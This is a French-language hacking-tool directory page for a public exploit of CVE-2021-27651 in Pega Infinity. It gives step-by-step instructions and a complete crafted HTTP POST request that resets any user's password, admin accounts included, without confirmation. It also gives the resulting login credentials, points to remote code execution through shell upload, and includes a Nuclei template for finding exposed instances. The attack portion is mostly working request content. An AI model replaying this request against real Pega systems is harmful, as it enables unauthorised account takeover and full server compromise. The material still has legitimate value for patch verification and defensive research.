Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-27651 — contourner toutes les étapes du flux de réinitialisation de mot de passe | Kitploit
Outils/GitHubGitHub/orangmuda/cve-2021-27651
Attaques de Mots de PasseAnalyse de CodeExploitationExploitation d'Applications WebAuthentificationOutil d'Accès à Distance
GitHuborangmuda/cve-2021-27651

CVE-2021-27651

contourner toutes les étapes du flux de réinitialisation de mot de passe

Voir le dépôt
11il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Résumé

Un attaquant peut contourner toutes les étapes du flux de réinitialisation de mot de passe et réinitialiser le compte de n'importe quel utilisateur sur Pega Infinity. Cela est réalisé en (1) initiant le flux de réinitialisation de mot de passe et en saisissant l'e-mail de la victime, puis (2) en forçant la requête HTTP POST à mettre à jour le mot de passe. Un attaquant pourrait se connecter en utilisant le compte nouvellement modifié et compromettre entièrement l'instance Pega via les nombreux vecteurs d'exécution de code post-authentification acceptables (modification de pages dynamiques, templating, etc.)

Étapes à reproduire

  1. Accédez à la page de connexion de n'importe quelle instance Pega
  2. Cliquez sur "réinitialiser le mot de passe"
  3. Saisissez "[email protected]", interceptez la requête HTTP, envoyez la requête HTTP avec "[email protected]" vers l'onglet Burp Repeater ou tout onglet similaire, puis laissez la requête passer en désactivant le proxy ou en cliquant sur "Envoyer"
  4. Après avoir laissé la requête initiale passer, modifiez le corps de la requête HTTP dans le Repeater pour y inclure les données suivantes...
root@kitploit:~
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
  1. Connectez-vous en utilisant les identifiants suivants après avoir envoyé la requête HTTP, après avoir contourné la partie confirmation de la réinitialisation de mot de passe et pouvoir vous connecter au compte administrateur...
root@kitploit:~
[email protected] / Rules@1234
  1. À partir de là, vous pouvez obtenir une exécution de code à distance (RCE) via l'un des nombreux vecteurs d'exécution de code acceptés réservés aux administrateurs.

Versions affectées

Pega Infinity >= 8.2.1 Pega Infinity <= 8.5.2

Impact

Compromission totale de toute instance Pega sans connaissance préalable.

Médias à l'appui

Contournement de mot de passe

  • Contournement de mot de passe

Exécution de code à distance via téléchargement de shell

  • Exécution de code à distance via téléchargement de shell

Modèle Nuclei

root@kitploit:~
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"

Crédits

Andri Wijayanti (@andridev_),

Télécharger l’outil